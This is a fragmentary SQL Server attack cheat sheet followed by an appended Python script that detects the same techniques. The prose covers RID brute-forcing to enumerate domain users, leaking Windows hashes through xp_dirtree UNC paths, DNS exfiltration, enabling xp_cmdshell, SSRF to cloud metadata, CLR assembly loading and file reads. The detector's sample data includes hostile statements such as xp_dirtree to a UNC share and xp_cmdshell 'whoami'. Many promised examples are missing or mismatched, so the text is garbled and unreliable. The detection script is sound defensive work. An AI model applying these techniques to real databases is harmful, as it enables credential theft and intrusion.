master.dbo.fn_varbintohexstr(SUSER_SID('MEGACORP\Administrator')): if you know the name of the domain (MEGACORP in this example), this function returns the SID of the user Administrator in hex format. It will look like 0x01050000000[...]0000f401; note how the last 4 bytes are the number 500 in big endian format, which is the common ID of the user Administrator. This function therefore lets you learn the ID of the domain (all the bytes except the last 4).

SUSER_SNAME(0x01050000000[...]0000e803): this function returns the username of the ID indicated (if any); in this case 0000e803 in big endian == 1000 (usually the ID of the first regular user created). You can therefore bruteforce user IDs from 1000 to 2000 and probably obtain all the usernames of the users of the domain. For example, using a function like the following one:

SUSER_NAME()
USER_NAME()
PERMISSIONS()
DB_NAME()
FILE_NAME()
TYPE_NAME()
COL_NAME()
USER_NAME()

fn_xe_file_target_read_file() example:

fn_get_audit_file() example:

fn_trace_gettable() example:

xp_dirtree allows you to list the directories in a folder. This stored procedure supports UNC paths, which can be abused to leak Windows credentials over the network or extract data using DNS requests.

Invoke-WebRequest request. You could do this via the hacker favorite xp_cmdshell as well.

xp_dirtree is, weirdly, undocumented by Microsoft, which led other folks on the Internet to document it. This method has been used in multiple Out of Band data exfiltration posts on the Internet.

Unlike LOAD_FILE, you can use xp_dirtree to make a network request only to TCP port 445. You cannot control the port number, but you can read information from network shares. Additionally, much like any UNC path access, Windows hashes will be sent over the network, where they can be captured and replayed for further exploitation. Environment: Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) running on a Windows Server 2016 Datacenter in the default config.

There are other stored procedures, such as master..xp_fileexist etc., that can be used for similar results.

xp_cmdshell spawns a Windows command shell and executes the string passed to it, returning any rows of text. This command runs as the SQL Server service account. xp_cmdshell is disabled by default. You can enable it using the SQL Server Configuration Option. Here's how:

Invoke-WebRequest can be used to make HTTP requests to perform Server Side queries. Requests to cloud metadata services need the header Metadata: true in the case of Azure or Metadata-Flavor: Google for GCP.

This requires dbo access, so it may not work unless the web application connects to the database as sa or with an Administrator role.

Before the CREATE ASSEMBLY query, add the SHA512 hash of the assembly to the list of trusted assemblies on the server (you can see the list using select * from sys.trusted_assemblies;).

Reading C:\Windows\win.ini using the function OpenRowset():

Currently executing requests and their SQL text can be listed with sys.dm_exec_requests and sys.dm_exec_sql_text:
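As an added example (not from the original page), the following Python flags the primitives described above in a batch of captured statements: xp_dirtree/xp_fileexist called with a UNC path, xp_cmdshell use and enabling, CREATE ASSEMBLY or trusted-assembly changes, OPENROWSET(BULK ...) reads, and a session resolving many RIDs through SUSER_SNAME. The (session_id, sql_text) row format and the sample rows are constructed assumptions; sp_add_trusted_assembly and the sp_configure option names are real SQL Server identifiers that the page itself does not mention.

```python
import re

# Signatures for the MSSQL primitives discussed above. The input format is an
# assumption: each row is (session_id, sql_text), as projected from an Extended
# Events or SQL Audit capture of the batches each session executed.
SIGNATURES = {
    "unc_path_call": re.compile(r"\b(xp_dirtree|xp_fileexist)\b[^;]*'\\\\", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "enable_dangerous_option": re.compile(
        r"sp_configure\s+'(xp_cmdshell|clr enabled)'\s*,\s*1\b", re.I),
    "clr_assembly": re.compile(r"\b(CREATE\s+ASSEMBLY|sp_add_trusted_assembly)\b", re.I),
    "openrowset_bulk": re.compile(r"\bOPENROWSET\s*\(\s*BULK\b", re.I),
}
# SUSER_SNAME called with a binary SID literal; the last 4 bytes are the RID.
SUSER_SNAME_SID = re.compile(r"SUSER_SNAME\s*\(\s*0x([0-9a-f]+)\s*\)", re.I)


def classify(sql):
    """Names of every signature matching a single statement, sorted."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(sql))


def scan(rows, rid_threshold=5):
    """Return {session_id: set of finding names}. A session that resolves at
    least rid_threshold distinct RIDs under one domain prefix is flagged as
    RID enumeration, although each SUSER_SNAME call is harmless on its own."""
    findings, rids_seen = {}, {}
    for session_id, sql in rows:
        for name in classify(sql):
            findings.setdefault(session_id, set()).add(name)
        for hex_sid in SUSER_SNAME_SID.findall(sql):
            prefix, rid = hex_sid[:-8].lower(), hex_sid[-8:].lower()
            rids_seen.setdefault((session_id, prefix), set()).add(rid)
    for (session_id, _), rids in rids_seen.items():
        if len(rids) >= rid_threshold:
            findings.setdefault(session_id, set()).add("rid_enumeration")
    return findings


# Constructed sample batch: a placeholder domain SID prefix and RIDs 1000..1006.
DOMAIN_PREFIX = "010500000000000515000000" + "11111111" * 3
SAMPLE_ROWS = [
    (51, "SELECT name FROM sys.databases"),
    (52, "EXEC master..xp_dirtree '\\\\10.0.0.5\\share'"),
    (53, "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"),
    (53, "EXEC xp_cmdshell 'whoami'"),
] + [
    (54, "SELECT SUSER_SNAME(0x%s%s)" % (DOMAIN_PREFIX, rid.to_bytes(4, "little").hex()))
    for rid in range(1000, 1007)
]
```

Running scan(SAMPLE_ROWS) reports session 52 for the UNC path call, session 53 for enabling and using xp_cmdshell, and session 54 for RID enumeration, while session 51 produces no finding.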